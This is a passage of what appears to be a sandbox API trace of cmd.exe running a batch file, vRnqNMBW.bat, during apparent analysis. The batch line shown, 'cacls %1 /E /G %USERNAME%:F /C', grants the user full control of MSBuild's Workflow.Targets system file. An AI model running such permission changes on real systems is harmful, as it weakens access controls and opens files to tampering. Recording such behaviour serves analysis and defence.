lpValue="$P$G") returned 1 [0264.873] GetEnvironmentStringsW () returned 0xec8118* [0264.874] FreeEnvironmentStringsA (penv="A") returned 1 [0264.874] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0264.874] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0264.874] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0264.874] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0264.874] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0264.874] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0264.874] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0264.874] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0264.874] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0264.874] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0264.874] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xcdf9d4 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0264.874] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0xcdf9d4, lpFilePart=0xcdf9cc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xcdf9cc*="Desktop") returned 0x1d [0264.874] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0265.724] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xcdf750 | out: lpFindFileData=0xcdf750) returned 0xec05c8 [0265.724] FindClose (in: hFindFile=0xec05c8 | out: hFindFile=0xec05c8) returned 1 [0265.724] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0xcdf750 | out: lpFindFileData=0xcdf750) returned 0xec05c8 [0265.724] FindClose (in: hFindFile=0xec05c8 | out: hFindFile=0xec05c8) returned 1 [0265.724] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0265.724] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0xcdf750 | out: lpFindFileData=0xcdf750) returned 0xec05c8 [0265.724] FindClose (in: hFindFile=0xec05c8 | out: hFindFile=0xec05c8) returned 1 [0265.724] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0265.725] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0265.725] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0265.725] GetEnvironmentStringsW () returned 0xec8118* [0265.725] FreeEnvironmentStringsA (penv="=") returned 1 [0265.725] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0265.726] GetConsoleOutputCP () returned 0x1b5 [0265.929] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0265.929] GetUserDefaultLCID () returned 0x409 [0265.929] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0265.930] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0xcdfb04, cchData=128 | out: lpLCData="0") returned 2 [0265.930] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0xcdfb04, cchData=128 | out: lpLCData="0") returned 2 [0265.930] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0xcdfb04, cchData=128 | out: lpLCData="1") returned 2 [0265.930] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0265.930] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0265.930] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0265.930] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0265.930] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0265.930] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0265.930] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0265.930] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0265.930] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0265.930] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0265.930] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0265.931] GetConsoleTitleW (in: lpConsoleTitle=0xecaa40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0265.993] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0265.993] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0265.993] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0265.993] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0265.994] _wcsicmp (_String1="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"", _String2=")") returned -7 [0265.994] _wcsicmp (_String1="FOR", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0265.994] _wcsicmp (_String1="FOR/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 68 [0265.994] _wcsicmp (_String1="IF", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0265.994] _wcsicmp (_String1="IF/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 71 [0265.994] _wcsicmp (_String1="REM", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0265.995] _wcsicmp (_String1="REM/?", _String2="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"") returned 80 [0265.996] GetConsoleTitleW (in: lpConsoleTitle=0xcdf7f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0265.998] GetFileAttributesW (lpFileName="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat\"" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\\"c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat\"")) returned 0xffffffff [0265.998] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0265.999] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0265.999] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0265.999] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0265.999] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0265.999] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0265.999] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0265.999] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0265.999] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0265.999] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0265.999] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0265.999] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0265.999] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0265.999] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0265.999] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0265.999] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0265.999] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0265.999] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0265.999] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0265.999] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0265.999] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0265.999] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0265.999] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0265.999] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0265.999] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0265.999] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0265.999] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0265.999] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0265.999] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0265.999] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0265.999] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0265.999] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0265.999] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0265.999] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0265.999] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0265.999] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0265.999] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0265.999] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0265.999] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0265.999] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0265.999] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0265.999] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0265.999] _wcsicmp (_String1="\"C", _String2="DIR") returned -66 [0265.999] _wcsicmp (_String1="\"C", _String2="ERASE") returned -67 [0265.999] _wcsicmp (_String1="\"C", _String2="DEL") returned -66 [0265.999] _wcsicmp (_String1="\"C", _String2="TYPE") returned -82 [0265.999] _wcsicmp (_String1="\"C", _String2="COPY") returned -65 [0265.999] _wcsicmp (_String1="\"C", _String2="CD") returned -65 [0266.000] _wcsicmp (_String1="\"C", _String2="CHDIR") returned -65 [0266.000] _wcsicmp (_String1="\"C", _String2="RENAME") returned -80 [0266.000] _wcsicmp (_String1="\"C", _String2="REN") returned -80 [0266.000] _wcsicmp (_String1="\"C", _String2="ECHO") returned -67 [0266.000] _wcsicmp (_String1="\"C", _String2="SET") returned -81 [0266.000] _wcsicmp (_String1="\"C", _String2="PAUSE") returned -78 [0266.000] _wcsicmp (_String1="\"C", _String2="DATE") returned -66 [0266.000] _wcsicmp (_String1="\"C", _String2="TIME") returned -82 [0266.000] _wcsicmp (_String1="\"C", _String2="PROMPT") returned -78 [0266.000] _wcsicmp (_String1="\"C", _String2="MD") returned -75 [0266.000] _wcsicmp (_String1="\"C", _String2="MKDIR") returned -75 [0266.000] _wcsicmp (_String1="\"C", _String2="RD") returned -80 [0266.000] _wcsicmp (_String1="\"C", _String2="RMDIR") returned -80 [0266.000] _wcsicmp (_String1="\"C", _String2="PATH") returned -78 [0266.000] _wcsicmp (_String1="\"C", _String2="GOTO") returned -69 [0266.000] _wcsicmp (_String1="\"C", _String2="SHIFT") returned -81 [0266.000] _wcsicmp (_String1="\"C", _String2="CLS") returned -65 [0266.000] _wcsicmp (_String1="\"C", _String2="CALL") returned -65 [0266.000] _wcsicmp (_String1="\"C", _String2="VERIFY") returned -84 [0266.000] _wcsicmp (_String1="\"C", _String2="VER") returned -84 [0266.000] _wcsicmp (_String1="\"C", _String2="VOL") returned -84 [0266.000] _wcsicmp (_String1="\"C", _String2="EXIT") returned -67 [0266.000] _wcsicmp (_String1="\"C", _String2="SETLOCAL") returned -81 [0266.000] _wcsicmp (_String1="\"C", _String2="ENDLOCAL") returned -67 [0266.000] _wcsicmp (_String1="\"C", _String2="TITLE") returned -82 [0266.000] _wcsicmp (_String1="\"C", _String2="START") returned -81 [0266.000] _wcsicmp (_String1="\"C", _String2="DPATH") returned -66 [0266.000] _wcsicmp (_String1="\"C", _String2="KEYS") returned -73 [0266.000] _wcsicmp (_String1="\"C", _String2="MOVE") returned -75 [0266.000] _wcsicmp (_String1="\"C", _String2="PUSHD") returned -78 [0266.000] _wcsicmp (_String1="\"C", _String2="POPD") returned -78 [0266.000] _wcsicmp (_String1="\"C", _String2="ASSOC") returned -63 [0266.000] _wcsicmp (_String1="\"C", _String2="FTYPE") returned -68 [0266.000] _wcsicmp (_String1="\"C", _String2="BREAK") returned -64 [0266.000] _wcsicmp (_String1="\"C", _String2="COLOR") returned -65 [0266.000] _wcsicmp (_String1="\"C", _String2="MKLINK") returned -75 [0266.000] _wcsicmp (_String1="\"C", _String2="FOR") returned -68 [0266.000] _wcsicmp (_String1="\"C", _String2="IF") returned -71 [0266.000] _wcsicmp (_String1="\"C", _String2="REM") returned -80 [0266.001] _wcsnicmp (_String1="C:\\U", _String2="cmd ", _MaxCount=0x4) returned -51 [0266.001] SetErrorMode (uMode=0x0) returned 0x0 [0266.001] SetErrorMode (uMode=0x1) returned 0x0 [0266.001] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.", nBufferLength=0x208, lpBuffer=0xec05d0, lpFilePart=0xcdf2fc | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xcdf2fc*="Desktop") returned 0x1d [0266.001] SetErrorMode (uMode=0x0) returned 0x1 [0266.001] NeedCurrentDirectoryForExePathW (ExeName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\.") returned 1 [0266.001] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0266.004] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.004] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", fInfoLevelId=0x1, lpFindFileData=0xcdf0a8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcdf0a8) returned 0xecb250 [0266.004] FindClose (in: hFindFile=0xecb250 | out: hFindFile=0xecb250) returned 1 [0266.004] _wcsicmp (_String1=".bat", _String2=".CMD") returned -1 [0266.004] _wcsicmp (_String1=".bat", _String2=".BAT") returned 0 [0266.004] GetConsoleTitleW (in: lpConsoleTitle=0xcdf57c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0266.004] ApiSetQueryApiSetPresence () returned 0x0 [0266.004] ResolveDelayLoadedAPI () returned 0x745414a0 [0266.006] SaferWorker () returned 0x0 [0266.017] SetErrorMode (uMode=0x0) returned 0x0 [0266.017] SetErrorMode (uMode=0x1) returned 0x0 [0266.017] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", nBufferLength=0x104, lpBuffer=0xecadf0, lpFilePart=0xcdf42c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat", lpFilePart=0xcdf42c*="vRnqNMBW.bat") returned 0x2a [0266.017] SetErrorMode (uMode=0x0) returned 0x1 [0266.018] wcsspn (_String=" \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\"", _Control=" \x09") returned 0x1 [0266.018] CmdBatNotificationStub () returned 0x1 [0266.018] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xcdf4bc, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0266.018] _open_osfhandle (_OSFileHandle=0xb4, _Flags=8) returned 3 [0266.018] _get_osfhandle (_FileHandle=3) returned 0xb4 [0266.018] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0266.018] _get_osfhandle (_FileHandle=3) returned 0xb4 [0266.018] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0266.018] ReadFile (in: hFile=0xb4, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xcdf48c, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xcdf48c*=0xe2, lpOverlapped=0x0) returned 1 [0266.019] SetFilePointer (in: hFile=0xb4, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0266.019] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=32, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="cacls %1 /E /G %USERNAME%:F /C\r\n") returned 32 [0266.020] _get_osfhandle (_FileHandle=3) returned 0xb4 [0266.020] GetFileType (hFile=0xb4) returned 0x1 [0266.020] _get_osfhandle (_FileHandle=3) returned 0xb4 [0266.020] SetFilePointer (in: hFile=0xb4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0266.020] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="CIiHmnxMn6Ps") returned 0xc [0266.020] _wcsicmp (_String1="cacls", _String2=")") returned 58 [0266.020] _wcsicmp (_String1="FOR", _String2="cacls") returned 3 [0266.020] _wcsicmp (_String1="FOR/?", _String2="cacls") returned 3 [0266.020] _wcsicmp (_String1="IF", _String2="cacls") returned 6 [0266.020] _wcsicmp (_String1="IF/?", _String2="cacls") returned 6 [0266.020] _wcsicmp (_String1="REM", _String2="cacls") returned 15 [0266.020] _wcsicmp (_String1="REM/?", _String2="cacls") returned 15 [0266.022] _tell (_FileHandle=3) returned 32 [0266.022] _close (_FileHandle=3) returned 0 [0266.023] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xcdf250 | out: _Buffer="\r\n") returned 2 [0266.023] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.023] GetFileType (hFile=0x3c) returned 0x2 [0266.023] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.023] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf228 | out: lpMode=0xcdf228) returned 1 [0266.023] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.023] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcdf240, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf240*=0x2) returned 1 [0266.023] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0266.023] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0266.024] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xcdf24c | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0266.024] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xcdf24c | out: _Buffer=">") returned 1 [0266.024] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.024] GetFileType (hFile=0x3c) returned 0x2 [0266.024] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.024] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf22c | out: lpMode=0xcdf22c) returned 1 [0266.024] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.024] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xcdf244, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xcdf244*=0x1e) returned 1 [0266.024] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.024] GetFileType (hFile=0x3c) returned 0x2 [0266.025] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.025] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4cc | out: lpMode=0xcdf4cc) returned 1 [0266.025] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.025] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0xec7730*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0xcdf4e4, lpReserved=0x0 | out: lpBuffer=0xec7730*, lpNumberOfCharsWritten=0xcdf4e4*=0x5) returned 1 [0266.025] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xcdf4ec | out: _Buffer=" \"C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.5\\Workflow.Targets\" /E /G CIiHmnxMn6Ps:F /C ") returned 112 [0266.025] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.025] GetFileType (hFile=0x3c) returned 0x2 [0266.025] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.025] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4c4 | out: lpMode=0xcdf4c4) returned 1 [0266.025] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.025] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x70, lpNumberOfCharsWritten=0xcdf4dc, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf4dc*=0x70) returned 1 [0266.026] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xcdf500 | out: _Buffer="\r\n") returned 2 [0266.026] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.026] GetFileType (hFile=0x3c) returned 0x2 [0266.026] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0266.026] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xcdf4d8 | out: lpMode=0xcdf4d8) returned 1 [0266.026] _get_osfhandle (_FileHandle=1) returned 0x3c [0266.026] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xcdf4f0, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xcdf4f0*=0x2) returned 1 [0266.026] _wcsicmp (_String1="cacls", _String2="DIR") returned -1 [0266.026] _wcsicmp (_String1="cacls", _String2="ERASE") returned -2 [0266.026] _wcsicmp (_String1="cacls", _String2="DEL") returned -1 [0266.026] _wcsicmp (_String1="cacls", _String2="TYPE") returned -17 [0266.026] _wcsicmp (_String1="cacls", _String2="COPY") returned -14 [0266.026] _wcsicmp (_String1="cacls", _String2="CD") returned -3 [0266.026] _wcsicmp (_String1="cacls", _String2="CHDIR") returned -7 [0266.026] _wcsicmp (_String1="cacls", _String2="RENAME") returned -15 [0266.026] _wcsicmp (_String1="cacls", _String2="REN") returned -15 [0266.026] _wcsicmp (_String1="cacls", _String2="ECHO") returned -2 [0266.026] _wcsicmp (_String1="cacls", _String2="SET") returned -16 [0266.026] _wcsicmp (_String1="cacls", _String2="PAUSE") returned -13 [0266.026] _wcsicmp (_String1="cacls", _String2="DATE") returned -1 [0266.026] _wcsicmp (_String1="cacls", _String2="TIME") returned -17 [0266.026] _wcsicmp (_String1="cacls", _String2="PROMPT") returned -13 [0266.026] _wcsicmp (_String1="cacls", _String2="MD") returned -10 [0266.026] _wcsicmp (_String1="cacls", _String2="MKDIR") returned -10 [0266.026] _wcsicmp (_String1="cacls", _String2="RD") returned -15 [0266.026] _wcsicmp (_String1="cacls", _String2="RMDIR") returned -15 [0266.026] _wcsicmp (_String1="cacls", _String2="PATH") returned -13 [0266.026] _wcsicmp (_String1="cacls", _String2="GOTO") returned -4 [0266.026] _wcsicmp (_String1="cacls", _String2="SHIFT") returned -16 [0266.026] _wcsicmp (_String1="cacls", _String2="CLS") returned -11 [0266.027] _wcsicmp (_String1="cacls", _String2="CALL") returned -9 [0266.027] _wcsicmp (_String1="cacls", _String2="VERIFY") returned -19 [0266.027] _wcsicmp (_String1="cacls", _String2="VER") returned -19 [0266.027] _wcsicmp (_String1="cacls", _String2="VOL") returned -19 [0266.027] _wcsicmp (_String1="cacls", _String2="EXIT") returned -2 [0266.027] _wcsicmp (_String1="cacls", _String2="SETLOCAL") returned -16 [0266.027] _wcsicmp (_String1="cacls", _String2="ENDLOCAL") returned -2 [0266.027] _wcsicmp (_String1="cacls", _String2="TITLE") returned -17 [0266.027] _wcsicmp (_String1="cacls", _String2="START") returned -16 [0266.027] _wcsicmp (_String1="cacls", _String2="DPATH") returned -1 [0266.027] _wcsicmp (_String1="cacls", _String2="KEYS") returned -8 [0266.027] _wcsicmp (_String1="cacls", _String2="MOVE") returned -10 [0266.027] _wcsicmp (_String1="cacls", _String2="PUSHD") returned -13 [0266.027] _wcsicmp (_String1="cacls", _String2="POPD") returned -13 [0266.027] _wcsicmp (_String1="cacls", _String2="ASSOC") returned 2 [0266.027] _wcsicmp (_String1="cacls", _String2="FTYPE") returned -3 [0266.027] _wcsicmp (_String1="cacls", _String2="BREAK") returned 1 [0266.027] _wcsicmp (_String1="cacls", _String2="COLOR") returned -14 [0266.027] _wcsicmp (_String1="cacls", _String2="MKLINK") returned -10 [0266.105] _wcsnicmp (_String1="cacl", _String2="cmd ", _MaxCount=0x4) returned -12 [0266.106] SetErrorMode (uMode=0x0) returned 0x0 [0266.106] SetErrorMode (uMode=0x1) returned 0x0 [0266.106] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0xecbf28, lpFilePart=0xcdf29c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xcdf29c*="Desktop") returned 0x1d [0266.106] SetErrorMode (uMode=0x0) returned 0x1 [0266.106] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0266.106] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0266.107] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0266.107] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.107] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xcdf028, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcdf028) returned 0xffffffff [0266.108] GetLastError () returned 0x2 [0266.108] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.108] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xcdf028, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcdf028) returned 0xffffffff [0266.108] GetLastError () returned 0x2 [0266.108] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0266.108] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xcdf028, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcdf028) returned 0xec0df8 [0266.108] FindClose (in: hFindFile=0xec0df8 | out: hFindFile=0xec0df8) returned 1 [0266.108] FindFirstFileExW (in: 